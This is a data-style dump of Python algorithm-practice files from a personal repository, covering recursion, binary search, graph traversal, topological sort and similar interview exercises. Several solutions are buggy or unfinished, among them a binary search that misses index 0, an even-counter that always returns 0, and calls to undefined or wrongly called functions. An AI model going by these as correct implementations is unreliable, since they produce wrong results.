"license_type": "no_license",
"max_line_length": 76,
"num_lines": 27,
"path": "/Recursion_DP/BbB/Tower of Hanoi.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# tower of hanoi\n\n\"\"\"\nAbdual bari explaination\n\nif n > 0\n\nmove all n - 1 disks from A to B using C\nmove the nth disk from A to C\nmove all n - 1 disks from B to C using A\n\nfrom to and aux rods will change accordingly in sub problems\n\"\"\"\n\n# its 2 ^ n cha=eck how\n\ndef towerofHanoi(n, from_rod, to_rod, aux_rod):\n # if n == 1:\n # print(\"Move Disk 1 from \"+ from_rod + \" to \" + to_rod)\n # return\n\n if n > 0:\n towerofHanoi(n-1, from_rod, aux_rod, to_rod)\n print(\"Move Disk \" + str(n) + \" from \" + from_rod + \" to \" + to_rod)\n towerofHanoi(n-1, aux_rod, to_rod, from_rod)\n\nprint(towerofHanoi(10, \"A\", \"C\", \"B\"))"
},
{
"alpha_fraction": 0.5272353291511536,
"alphanum_fraction": 0.5632065534591675,
"avg_line_length": 15.233333587646484,
"blob_id": "41585c1ff2376356f70ba3995810795b6cac4d8b",
"content_id": "0e08f49608daec6e0acb9781b96bacdd453d6f92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 60,
"path": "/Interview1_1/9_23_binarysearch.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# binary search without recursion\n\n\"\"\"\nI/P = sorted list and intergers\n\n-inf to inp\n\no/p - index of the first reference\nNone\n\"\"\"\n\n# from bisect import bisect_left\n\n\"\"\"\nIterative step:\n\nvariables storing indices - first last middle\n\nwhile middle != 1:\n1) find the middle element - len(list) // 2 \nif equal then I well return the index\nif value is less then middle element\n#first = first\nlast = middle\nelseif:\nfirst = middle\n#last = last\n\nreturn None\n\n\"\"\"\n\ndef binary_search(l, val):\n first = 0 # 0\n last = len(l) - 1 # 3\n middle = len(l) // 2 # 1\n\n while middle > 0:\n if l[middle] == val:\n return middle\n elif l[middle] < val:\n first = middle\n middle = (last - first) // 2 + first\n else:\n last = middle\n middle = (last - first) // 2\n\n return None\n\n# Test cases\n\"\"\"\nl1 = [-2, 3, 4, 6, 8, 10] val= 3\n\n\n\n\"\"\"\n\na = binary_search([-10, -2, 3, 4, 6, 8, 10, 19, 21], -2)\n\nprint(a)"
},
{
"alpha_fraction": 0.5153061151504517,
"alphanum_fraction": 0.5408163070678711,
"avg_line_length": 20.83333396911621,
"blob_id": "cb6d8a86fde2258bc9debb4047318747de12eb14",
"content_id": "61c505012b839b9f18aba7924ec06020cba9d370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 392,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 18,
"path": "/Daily_InterviewPro/1018_Find the non-duplicate number.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nGiven a list of numbers, where every number shows up twice except for one number, find that one number.\n\n\"\"\"\n\ndef singleNumber(nums):\n # Fill this in.\n nums.sort()\n\n for i in range(0, len(nums), 2):\n if i == len(nums):\n return nums[i]\n else:\n if nums[i] != nums[i+1]:\n return nums[i]\n\n\nprint(singleNumber([4, 3, 2, 4, 1, 3, 2]))"
},
{
"alpha_fraction": 0.5891402959823608,
"alphanum_fraction": 0.5972850918769836,
"avg_line_length": 21.5510196685791,
"blob_id": "f94db23dd334dfdd171d923fa36e49e7c74c818f",
"content_id": "494d144c2d8a51b310055d286ef40047a9609638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 49,
"path": "/Trees/Edu/8.2 BT search (BFS).py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Binary Tree Level Order Traversal\n\n\"\"\"\nGiven a binary tree, populate an array to represent its level-by-level traversal.\nYou should populate the values of all nodes of each level from left to right in separate sub-arrays.\n\n\"\"\"\n\n# class Tree Node\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\ndef BFS(root):\n result = []\n\n if root == None:\n return None\n\n queue = []\n queue.append(root)\n\n while queue:\n levelsize = len(queue)\n currentlevel = []\n\n for _ in range(levelsize):\n curr = queue.pop(0)\n currentlevel.append(curr.val)\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n\n result.append(currentlevel)\n\n return result\n\ndef main():\n root = TreeNode(12)\n root.left = TreeNode(7)\n root.right = TreeNode(1)\n root.left.left = TreeNode(9)\n root.right.left = TreeNode(10)\n root.right.right = TreeNode(5)\n print(\"Level order traversal: \", str(BFS(root)))\n\nmain()\n"
},
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.650943398475647,
"avg_line_length": 14.285714149475098,
"blob_id": "239fd5d7cacdf27266adfd6451ec747df0d0d7e4",
"content_id": "a9286bdd058d96ed581dea466f03cae064bf365e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/testing.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# print(set(range(10)))\n\n#print(\"bbccdddhjkkkmmnpqqssttuuuwwxxxyyy\"[33])\n\na = [1,2,3,4,5,6]\n\nprint(a[:-1])"
},
{
"alpha_fraction": 0.6139896512031555,
"alphanum_fraction": 0.6243523359298706,
"avg_line_length": 15.782608985900879,
"blob_id": "07acb0a623da2c8e0645de2e95e59750e95aac09",
"content_id": "929611c2a3c89fb6dbb030353cb739a18a30424c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/Recursion_DP/BbB/Find all substrings of a string.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all substrings\n\n# Concept (pick or dont pick)\nres = []\n\ndef substring(s):\n findSubstring(s, \"\")\n\n return res\n\n# see notebook for the diagram\n\ndef findSubstring(s, ans):\n\n if len(s) == 0:\n res.append(ans)\n return\n\n findSubstring(s[1:], ans + s[0]) #picking firs element\n\n findSubstring(s[1:], ans) # not picking first element\n\nprint(substring(\"abc\"))\n"
},
{
"alpha_fraction": 0.47980502247810364,
"alphanum_fraction": 0.4993036091327667,
"avg_line_length": 18.6849308013916,
"blob_id": "dc19208a3b7aa093a1588f3abb635f7c67c427b2",
"content_id": "1cf6fe1bd966c6cc24370a8f59e75c4a7fe41820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1436,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 73,
"path": "/Interview1_1/9_30.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding the depth of a binary tree\n\n\"\"\"\ninput : root\nBinary tree : not balanced\n\nouput: the height of the tree\n\n 5\n / \\\n 4 7\n / \\ \\\n 12 15 15\n \\\n 19\nuse Breadth first search\n\"\"\"\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\ndef height(root):\n # BFS use queues\n\n #res = []\n\n if root == None:\n return None\n\n queue = []\n\n queue.append(root)\n\n count = -1\n\n while queue:\n level_length = len(queue)\n levelelement = []\n count += 1\n for _ in range(level_length):\n current = queue.pop(0)\n levelelement.append(current.val)\n if current.left:\n queue.append(current.left)\n if current.right:\n queue.append(current.right)\n\n #res.append(levelelement)\n\n return count #len(res) - 1\n\ndef main():\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(3)\n root.right.left = TreeNode(4)\n root.right.left.left = TreeNode(5)\n\n # root = TreeNode(5)\n # root.left = TreeNode(4)\n # root.right = TreeNode(7)\n # root.left.left = TreeNode(12)\n # root.left.right = TreeNode(15)\n\n #root = TreeNode(5)\n\n #root = None\n\n print(\"height:\", str(height(root)))\n\nmain()"
},
{
"alpha_fraction": 0.651260495185852,
"alphanum_fraction": 0.6659663915634155,
"avg_line_length": 30.799999237060547,
"blob_id": "8587b0553250f4b1eb9456cfee505ea640fe70ec",
"content_id": "5bd8ce354aa1a41709c7b3543d4f75093198ee14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 476,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 15,
"path": "/Recursion_DP/BbB/Insert an item at the bottom of a stack.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Insert an item at the bottom of a stack\n\ndef insertBottom(stack, ele):\n\n if len(stack) == 0:\n stack.append(ele) # push the element\n else:\n temp = stack.pop() # temp stores at every recursive instance\n insertBottom(stack, ele) # think the recursive step as if you are going to be inside\n stack.append(temp) # appends at every recursive instance\n\n #print(stack) # will print every time\n return stack\n\nprint(insertBottom([2,3,4,5,6], 1))"
},
{
"alpha_fraction": 0.542001485824585,
"alphanum_fraction": 0.5777940154075623,
"avg_line_length": 23.909090042114258,
"blob_id": "031d31bf872e71d23e2728cc180f53d9df47d67e",
"content_id": "50583994513b17c18845b4d87c45e73af3be8aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 55,
"path": "/Sorting/10.9 Sorted Matrix Search:.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSorted Matrix Search: Given an M x N matrix in which each row and each column is sorted in ascending\norder, write a method to find an element.\n\n\"\"\"\n\nimport numpy as np\nfrom bisect import bisect_left\n\n\ndef BinarySearch(a, x):\n i = bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n else:\n return -1\n\n\n# returns the element from bottom most row\ndef sorted_matrix_search(matrix, value):\n matrix = np.array(matrix)\n # print(matrix)\n first_column = matrix[:, 0]\n # print(first_column)\n\n # element_index = bisect_left(first_column, value)\n # if element_index != len(first_column) and first_column[element_index] == value:\n # return element_index\n element_index = BinarySearch(first_column, value)\n # print(element_index)\n if element_index != -1:\n return element_index, 0\n else:\n # selecting row index less than value\n row_index = np.argmin(value - first_column[first_column < value])\n\n while row_index >= 0:\n i = BinarySearch(matrix[row_index], value)\n if i != -1:\n return row_index, i\n else:\n row_index -= 1\n\n return \"Not Found\"\n\n\nm = [[-6, -5, -3, -1, 0],\n [-1, 0, 1,\t2, 3],\n [1, 2, 2, 4, 5],\n [2, 2, 4, 5, 6],\n [4, 5,\t6, 7, 8],\n [6, 7, 8, 9, 10],\n [10, 11, 12, 13, 14]]\n\nprint(sorted_matrix_search(m, -1))"
},
{
"alpha_fraction": 0.5487735271453857,
"alphanum_fraction": 0.5727324485778809,
"avg_line_length": 21.779220581054688,
"blob_id": "0ed3deb229aaa1d20ccf9ddccc44db41b22b57b8",
"content_id": "2da6849ce5cc8760d7cf2b9c6735b47877ebc4e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1753,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 77,
"path": "/Graphs/LC/797. All Paths From Source to Target.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all paths from source to target\n\n\"\"\"\nGiven a directed acyclic graph of N nodes. Find all possible paths from node 0 to node N-1,\nand return them in any order.\n\nThe graph is given as follows: the nodes are 0, 1, ..., graph.length - 1.\ngraph[i] is a list of all nodes j for which the edge (i, j) exists.\n\nInput: graph = [[1,2],[3],[3],[]]\nOutput: [[0,1,3],[0,2,3]]\nExplanation: There are two paths: 0 -> 1 -> 3 and 0 -> 2 -> 3.\n\n\"\"\"\n\n# not necessary to do\n# convert graph from list of list to dict\ndef list_to_dict(l):\n return dict(zip([i for i in range(len(l))], l))\n\n\ndef bfs(graph, node):\n visited = set()\n path = []\n queue = []\n queue.append(node)\n while queue:\n element = queue.pop(0)\n if element not in visited:\n visited.add(element)\n path.append(element)\n for neighbour in graph[element]:\n queue.append(neighbour)\n\n return path\n\n# write code but wrong logic\n\n# def allPathsSourceTarget(graph):\n# #graph = list_to_dict(graph)\n# res = []\n#\n# for node in graph[0]:\n# path = bfs(graph, node)\n# if len(graph)-1 in path:\n# path.insert(0,0)\n# res.append(path)\n#\n# return res\n\n\n# Count by dfs with memo.\ndef allPathsSourceTarget(graph):\n def dfs(curr, path):\n if curr == len(graph) - 1:\n res.append(path)\n else:\n for i in graph[curr]:\n dfs(i, path + [i])\n\n res = []\n dfs(0, [0])\n\n return res\n\n\n#graph = [[1,2],[3],[3],[]]\ngraph = [[4,3,1],[3,2,4],[3],[4],[]] # this gives the wrong answer for the previous one\n# print(graph)\n# print(bfs(graph, 0))\nprint(allPathsSourceTarget(graph))\n\n\n\n#print(list_to_dict(graph))\n\n#print([i for i in len(graph)])"
},
{
"alpha_fraction": 0.6806219816207886,
"alphanum_fraction": 0.6854066848754883,
"avg_line_length": 24.303030014038086,
"blob_id": "fa171b102f893f44d6afc895cdd9f9fce4c9816f",
"content_id": "c9705abde5c31f294dacc998f196109997178968",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 836,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 33,
"path": "/Linked_List/LC/876. Middle of the Linked List.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding a middle element in a linked list\n\n\"\"\"\n\nGiven a non-empty, singly linked list with head node head, return a middle node of linked list.\n\nIf there are two middle nodes, return the second middle node.\n\"\"\"\n\n# lets use fast and slow pointer technique for finding the middle element\n# Logic: once fast pointer reaches the end the slow pointer will be in middle\n# odd length return middle\n# evenlength return 2nd middle\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\ndef middleNode(self, head: ListNode) -> ListNode:\n fastp = head\n slowp = head\n count = 1 # counter if count would be required\n\n while fastp and fastp.next:\n slowp = slowp.next\n count += 1\n fastp = fastp.next.next\n\n return slowp\n\n"
},
{
"alpha_fraction": 0.552949070930481,
"alphanum_fraction": 0.5764074921607971,
"avg_line_length": 25.192981719970703,
"blob_id": "bafd0d5233e19a0318ef524fda0019267a825871",
"content_id": "8580e4cba2093bb6ec0954f4aa115e489b3f84a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1516,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 57,
"path": "/Interview1_1/10_21 Graph.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nyou are given a list of commands
each command looks like this:
\ncommand are: ADD, SUB, MUL, VALUE
VALUE => putting an item in your return array
command looks\nlike: { type: ADD, loc1: number, loc2: number}\nresuts array which keeps track of the output
\nfirst command => res[0]
\nsecond command => res[1]
\ncommand.loc1, you can either have a number, or you have an\nindex '$idx'
for example
{ type: ADD, loc1: 5, loc2: 3} => 8
\nbuut
{type: ADD, loc1: '$1', loc2: '$2' } => add res[1] with res[2]\n\nmake a function that returns an array of commands and returns a results array\ninput: [{ type: VALUE, loc1: 5, loc2: null}, {type: ADD, loc1: '$0', loc2: 3}]
\nreturns [5, 8]\n\n\"\"\"\n# can try to develop a graph\n\"\"\"\nprobable solution:\n1) lenght = len(input) , results= []\n\n\n\"\"\"\n\ndef command(command_list):\n lenght = len(command_list)\n\n results = []\n\n for command in command_list:\n if command['type'] == \"VALUE\":\n if isinstance(command['loc1'], str):\n if results[int(command['loc1'][1])]:\n results.append(results[int(command['loc1'][1])])\n else:\n results.append(None)\n else:\n results.append(command['loc1'])\n if command['type'] == \"ADD\":\n if isinstance(command['loc1'], str):\n if results[int(command['type'][1])]:\n results.append(results[int(command['type'][1])])\n else:\n results.append(None)"
},
{
"alpha_fraction": 0.4367816150188446,
"alphanum_fraction": 0.4687100946903229,
"avg_line_length": 17.23255729675293,
"blob_id": "97d1b41025c1baeb0063083b592de271e4805b55",
"content_id": "0df2f0c3f9ffc8b1af6d0deb0051ba2401d40b2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 43,
"path": "/Interview1_1/11_4 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Binary search using recursion\n\n\"\"\"\n\ninput: [-1, 2, 4, 5, 6] find = 4\nreturn 2\n\nfind = 7\nreturn None\n\n\"\"\"\n\ndef binarySearch(arr, num):\n\n first_1 = 0\n last_1 = len(arr)- 1\n # mid = (last - first) // 2\n\n def helpersearch(first, last, num):\n\n if first == last:\n if arr[first] == num:\n return first\n else:\n return None\n\n mid = ((last - first) // 2) + first\n\n if arr[mid] == num:\n return mid\n else:\n if num < arr[mid]:\n last = mid - 1\n elif num > arr[mid]:\n first = mid + 1\n\n return helpersearch(first, last, num)\n\n res = helpersearch(first_1, last_1, num)\n\n return res\n\nprint(binarySearch([-1, 2, 4, 5, 6, 7], 8))"
},
{
"alpha_fraction": 0.5842204093933105,
"alphanum_fraction": 0.6061365008354187,
"avg_line_length": 25.633333206176758,
"blob_id": "3406868b1a571e2f5c9341ecd905c063df15bc6a",
"content_id": "b317e7d6dba1b8cf86ff06ddc793a7c2dccd6af2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1609,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 60,
"path": "/educative/17. Topological Sort/5. All task scheduling order.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# not solve, it is backtracking\n\n\"\"\"\nThere are ‘N’ tasks, labeled from ‘0’ to ‘N-1’. Each task can have some prerequisite tasks\nwhich need to be completed before it can be scheduled. Given the number of tasks and a list\nof prerequisite pairs, write a method to print all possible ordering of tasks meeting all prerequisites.\n\n\"\"\"\n\n\"\"\"\nSo I can do topological sort and find out if it is possible to get all the sequences. \nso the sequences will be depending upon the number of sources in \n\n\"\"\"\n\nfrom collections import deque\n\ndef print_orders(tasks, prerequisites):\n orders = []\n\n # if no orders\n if tasks <= 0:\n return orders\n\n # make the graph and inDegree\n inDegree = {i:0 for i in range(tasks)}\n graph = {i:[] for i in range(tasks)}\n\n for edge in prerequisites:\n parent, child = edge[0], edge[1]\n inDegree[child] += 1\n graph[parent].append(child)\n\n sources = deque()\n\n for key in inDegree:\n if inDegree[key] == 0:\n sources.append(key)\n\n while sources:\n node = sources.popleft()\n orders.append(node)\n\n for vertex in graph[node]:\n inDegree[vertex] -= 1\n if inDegree[vertex] == 0:\n sources.append(vertex)\n\n\n if len(orders) != tasks:\n return []\n\n return orders\n\ndef main():\n print(\"print order:\" + str(print_orders(3, [[0, 1], [1, 2]])))\n print(\"print order:\" + str(print_orders(3, [[0, 1], [1, 2], [2, 0]]))) # none will have indgree one\n print(\"print order:\" + str(print_orders(6, [[2, 5], [0, 5], [0, 4], [1, 4], [3, 2], [1, 3]])))\n\nmain()"
},
{
"alpha_fraction": 0.5668933987617493,
"alphanum_fraction": 0.5668933987617493,
"avg_line_length": 22.236841201782227,
"blob_id": "92f54d60b1c906e8a0b4cc5daba4fd5c0fb477dc",
"content_id": "7839260e4e041525c2cbd75be1d40ced07761085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 38,
"path": "/Graphs/Graph_DFS.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Traversing the graph using Depth first search (DFS)\n\n# visited set to keep track of visiting nodes\nvisited = set()\n\n# using resursion\ndef dfs_recursion(visited, graph, node): # node is the starting node\n if node not in visited:\n print(node)\n visited.add(node)\n for neighbour in graph[node]:\n dfs(visited, graph, neighbour)\n\n# DFS using stack\ndef dfs(visited, graph, node):\n stack = []\n stack.append(node)\n while stack:\n element = stack.pop()\n if element not in visited:\n print(element)\n visited.add(element)\n for neighbour in graph[element]:\n stack.append(neighbour)\n\n\n\n# Using a Python dictionary to act as an adjacency list\ngraph = {\n 'A' : ['B','C'],\n 'B' : ['D', 'E'],\n 'C' : ['F'],\n 'D' : [],\n 'E' : ['F'],\n 'F' : []\n}\n\nprint(dfs(visited, graph, 'A'))"
},
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6776119470596313,
"avg_line_length": 26.83333396911621,
"blob_id": "ec425f745f009f7626e34792759ac2f30f5416e1",
"content_id": "a8e69e4ecd428e2da08e62a387039b82df7b8951",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 24,
"path": "/Arrays_Strings/HR/Sherlock and Anagrams.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all possible anagrams\n\n\"\"\"\n\nTwo strings are anagrams of each other if the letters of one string can be rearranged to form the other string.\n Given a string, find the number of pairs of substrings of the string that are anagrams of each other.\n\nFor example , the list of all anagrammatic pairs is at positions respectively.\n\n\n\"\"\"\nfrom collections import Counter\n\ndef sherlockAndAnagrams(s):\n arr = []\n # all possible strings\n for i in range(1, len(s)):\n for j in range(0, len(s)- i + 1):\n arr.append(\"\".join(sorted(s[j:j+i])))\n\n count = Counter(arr)\n #return v > 1 for k, v in count.items():\n\nprint(sherlockAndAnagrams(\"mom\"))\n\n\n"
},
{
"alpha_fraction": 0.5525727272033691,
"alphanum_fraction": 0.5883668661117554,
"avg_line_length": 21.923076629638672,
"blob_id": "ead336ffc883f56355b103cec08a7436b382a709",
"content_id": "a5dfb5548ce97d47ccea60ea4f62b20c4c59d0f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 39,
"path": "/Stacks and Queues/17.9 Kth multiple.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nKth Multiple: Design an algorithm to find the kth number such that the only prime factors are 3, 5, and 7.\nNote that 3, 5, and 7 do not have to be factors,but it should not have any other prime factors.\nFor example,the first several multiples would be(in order) 1,3,5,7,9,15, 21.\n\"\"\"\n\n\"\"\"\nWill maintain 3 queues and multiply again and again\n\"\"\"\n\n\ndef k_multiple(k):\n res_Q = [1, 3, 5, 7]\n temp_Q = [3, 5, 7]\n multiples = [3, 5, 7]\n\n if k <= 0:\n raise ValueError(\" value can't be less than 1\")\n if k < 5:\n return res_Q[k-1]\n\n while len(res_Q) < k:\n next_element = temp_Q.pop(0)\n\n for i in multiples:\n allow_element = next_element * i\n if allow_element not in res_Q:\n res_Q.append(allow_element)\n temp_Q.append(allow_element)\n\n return res_Q[-1]\n\n\nprint(k_multiple())\n\n\n\"\"\"\nCan do better\n\"\"\""
},
{
"alpha_fraction": 0.5567484498023987,
"alphanum_fraction": 0.5966257452964783,
"avg_line_length": 19.40625,
"blob_id": "2315bfcbf07e0064cf4efd254a2c9889bcc8009d",
"content_id": "b698d06a09c8c701c448fd1dd46c314649957130",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 32,
"path": "/Recursion_DP/BbB/counteven.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# counting even numbers in array using recursion\n\n# building result as we return\ndef countEven(arr):\n return countEvenhelper(arr, 0)\n\n\ndef countEvenhelper(arr, i):\n if i >= len(arr):\n return 0\n result = countEvenhelper(arr, i + 1)\n if arr[i] % 2 == 0:\n result += 1\n return result\n\n\n#print(countEven([1, 2, 3, 4, 5, 6, 8]))\n\n# passing variable\ndef countEvenPassed(arr):\n result = 0\n helperfun(arr, 0, result)\n return result\n\ndef helperfun(arr, i, result):\n if i >= len(arr):\n return\n if arr[i] % 2 == 0:\n result += 1\n helperfun(arr, i+1, result)\n\nprint(countEvenPassed([1, 2, 3, 4, 5, 6, 8]))"
},
{
"alpha_fraction": 0.5973072052001953,
"alphanum_fraction": 0.6187270283699036,
"avg_line_length": 26.233333587646484,
"blob_id": "df2dca2a82f385d1ded163779c7de743f7a02ed0",
"content_id": "d28149fe8582fb685f752c2069787d0b1d23129e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1646,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 60,
"path": "/educative/17. Topological Sort/3. Task Scheduling.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Scheduling the task\n\n\"\"\"\nThere are ‘N’ tasks, labeled from ‘0’ to ‘N-1’. Each task can have some prerequisite tasks which need\nto be completed before it can be scheduled. Given the number of tasks and a list of prerequisite pairs,\nfind out if it is possible to schedule all the tasks.\n\"\"\"\n\n\"\"\"\ntopological sorting where i will sort the vertices based on given relations and find out if task scheduling is \npossible or not\n\n\"\"\"\n\nfrom collections import deque\n\ndef scheduling(tasks, prerequisites):\n\n scheduleOrder = []\n\n if tasks <= 0:\n return scheduleOrder\n\n # initialize the graph\n inDegree = {i: 0 for i in range(tasks)}\n graph = {i: [] for i in range(tasks)}\n\n # populate the graph and indegree\n for edge in prerequisites:\n parent, child = edge[0], edge[1]\n inDegree[child] += 1\n graph[parent].append(child)\n\n # from where the things originate\n sources = deque()\n for node in inDegree:\n if inDegree[node] == 0:\n sources.append(node)\n\n while sources:\n vertex = sources.popleft()\n scheduleOrder.append(vertex)\n for child in graph[vertex]:\n inDegree[child] -= 1\n if inDegree[child] == 0:\n sources.append(child)\n\n # check for cycles\n # if len(scheduleOrder) > tasks:\n # return False\n print(graph)\n print(scheduleOrder)\n return len(scheduleOrder) == tasks\n\n\ndef main():\n print(scheduling(3, [[0, 1], [1, 2]]))\n print(scheduling(3, [[0, 1], [1, 2], [2, 0]])) # none will have indgree one\n print(scheduling(6, [[2, 5], [0, 5], [0, 4], [1, 4], [3, 2], [1, 3]]))\nmain()\n"
},
{
"alpha_fraction": 0.5128205418586731,
"alphanum_fraction": 0.5280448794364929,
"avg_line_length": 23.431371688842773,
"blob_id": "e14214b8e98fde76d806a24044998e8842144931",
"content_id": "0bfef5af2001976594641fee03c097af43d07f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1248,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 51,
"path": "/Graphs/LC/130. Surrounded Regions.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find the surrounded regions\n\n\"\"\"\nInput:\n'X' 'X' 'X' 'X'\n'X' O O 'X'\n'X' 'X' O 'X'\n'X' O 'X' 'X'\n\nOutput:\n'X' 'X' 'X' 'X'\n'X' 'X' 'X' 'X'\n'X' 'X' 'X' 'X'\n'X' O 'X' 'X'\n\n\"\"\"\n\n\"\"\"\nsteps:\nfirst i will go thorough the borders and see if any zeros are there and make it one \nfirst row, last row, first column, last column if any one converted, repeat the row and column with -1 \n\nthen going each row by row we will convert all the 0 to 'X' \nthen going each row by row convert all the ones to zero\n\n\"\"\"\n\n#def solve(self, board: List[List[str]]) -> None:\ndef solve(board):\n changed_any = 0\n def convertingtoone(board, fr, lr, fc, lc):\n for i in range(len(board[fr])):\n if board[fr][i] == 0: board[fr][i] = 1\n for i in range(len(board[lr])):\n if board[lr][i] == 0: board[lr][i] = 1\n for i in range(len(board[fr])):\n if board[i][fc] == 0: board[i][fc] = 1\n for i in range(len(board[lr])):\n if board[i][lc] == 0: board[i][lc] = 1\n\n return board\n\n board = convertingtoone(board, 0, len(board)-1, 0, len(board)-1)\n\n return board\n\nboard = [['X', 'X', 'X', 'X'],\n ['X', 0, 0, 'X'],\n ['X', 'X', 0, 'X'],\n ['X', 0, 'X', 'X']]\nprint(solve(board))\n\n\n"
},
{
"alpha_fraction": 0.5102040767669678,
"alphanum_fraction": 0.5227629542350769,
"avg_line_length": 20.266666412353516,
"blob_id": "196afefc26fa2ea50c994450d6f12b3a85b30ede",
"content_id": "1c4a9206294b6708d55442e02ae5e0329fc4b7e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 637,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 30,
"path": "/contest_LC/November/Day 3 Consecutive Characters.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Consecutive Characters\n\n\"\"\"\nGiven a string s, the power of the string is the maximum length of a non-empty substring\nthat contains only one unique character.\n\nReturn the power of the string.\n\"\"\"\nfrom collections import Counter\n\ndef maxPower(s):\n res = 1\n power = 1\n\n for i in range(len(s)-1):\n for j in range(i+1,len(s)):\n if s[i] == s[j]:\n power += 1\n else:\n if power > res:\n res = power\n power = 1\n break\n if power > res:\n res = power\n power = 1\n\n return res\n\nprint(maxPower2(\"leetcode\"))"
},
{
"alpha_fraction": 0.45357832312583923,
"alphanum_fraction": 0.5019342303276062,
"avg_line_length": 17.140350341796875,
"blob_id": "086c535435b4cd3e41406b00798842bcaae24eda",
"content_id": "38de278e763a340a6dc92a355c1ace13cb2cf9cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1034,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 57,
"path": "/Recursion_DP/LC/1137. N-th Tribonacci Number.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
